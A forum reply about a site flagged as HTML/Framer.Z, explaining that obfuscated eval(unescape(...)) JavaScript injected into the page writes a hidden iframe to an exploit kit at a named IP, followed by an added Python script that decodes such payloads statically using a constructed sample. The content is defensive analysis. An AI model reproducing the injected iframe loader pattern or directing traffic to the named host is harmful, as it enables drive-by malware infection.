bobince

join:2002-04-19
DE

Re: Question about HTML/Framer.Z

quote:
only if the page contains a working exploit for your OS/patch level will Norton actually trigger on it
Not necessarily. AVs including Norton also trigger on encoded JavaScript snippets which end up document.write()ing redirections to exploits, regardless of whether the exploit at the end is actually reached. Occasionally this produces false positives with other encoded JavaScripts, but generally speaking obfuscated JavaScript is usually a sign that something dodgy is up.

Trying to come to a conclusion about whether a site is really hacked or not from the responses of popular AVs is a pointless task, as well as likely to get you infected. If you want to really know what's going on, you have to look at the code. It's not that hard and it's much more productive than arguing over which AV is the more canonical (tip: none of them are really that reliable).

So given the above post, we can guess the place to look is view-source:hxxp://tigerjimmytattoo.com/. Immediately obvious at the bottom of that is:

{script}eval(unescape("%77%69%6e%64%6f%77%2e...

Code like this is an immediate big red flag.

Anyhow, should we try unescape()ing this manually, we find it writes out an iframe tag pointing to a 'gpack' exploit kit at 58.65.232.33, a server at known Russian-related malware host HostFresh. Currently the URL leads only to a 404, so it's not quite true to say the site is infected *right now*, but it's definitely been hacked and there probably have been/will be exploits from there at other times.
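
Added example, not part of the original post: a static decoder for the `eval(unescape("..."))` pattern shown above. It reimplements `unescape()` as plain string substitution, so nothing from the page is executed, and lists any iframe targets it finds. The sample page and the host `kit.example.invalid` are constructed, and the function names are this example's own.

```python
import re

# JavaScript unescape(): %uXXXX is one UTF-16 code unit, %XX one byte value.
ESC_RE = re.compile(r'%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})')
# String literal passed to eval(unescape(...)), single or double quoted.
CALL_RE = re.compile(r'''eval\s*\(\s*unescape\s*\(\s*(["'])(.*?)\1''', re.S)
# src attribute of an iframe tag in a decoded layer.
IFRAME_RE = re.compile(r'''<iframe\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)''', re.I)
MAX_LAYERS = 5  # assumption: stop unwrapping nested layers after this depth


def js_unescape(s):
    """Reimplement unescape() as plain string substitution."""
    return ESC_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def defang(url):
    """Write http as hxxp so the URL is not clickable in a report."""
    return re.sub(r'^http', 'hxxp', url, flags=re.I)


def analyze(html):
    """Decode every eval(unescape("...")) payload without executing it."""
    findings = []
    queue = [(m.group(2), 1) for m in CALL_RE.finditer(html)]
    while queue:
        encoded, depth = queue.pop(0)
        decoded = js_unescape(encoded)
        findings.append({'depth': depth, 'decoded': decoded,
                         'iframes': [defang(u) for u in IFRAME_RE.findall(decoded)]})
        if depth < MAX_LAYERS:  # a decoded layer may wrap another encoded one
            queue += [(m.group(2), depth + 1) for m in CALL_RE.finditer(decoded)]
    return findings


def percent_encode(s):
    """Only used to build the constructed sample below."""
    return ''.join('%%%02x' % ord(c) for c in s)


# Constructed sample, not the payload from the site in the post.
SAMPLE_JS = ("document.write('<iframe src=\"http://kit.example.invalid/\" "
             "width=1 height=1></iframe>')")
SAMPLE_PAGE = ('<html><body>...</body><script>eval(unescape("%s"))</script></html>'
               % percent_encode(SAMPLE_JS))

if __name__ == '__main__':
    for f in analyze(SAMPLE_PAGE):
        print(f['depth'], f['iframes'], f['decoded'])
```

Run it against a saved copy of the page source rather than a live browser session; a finding with an empty `iframes` list still deserves a manual read of its `decoded` text.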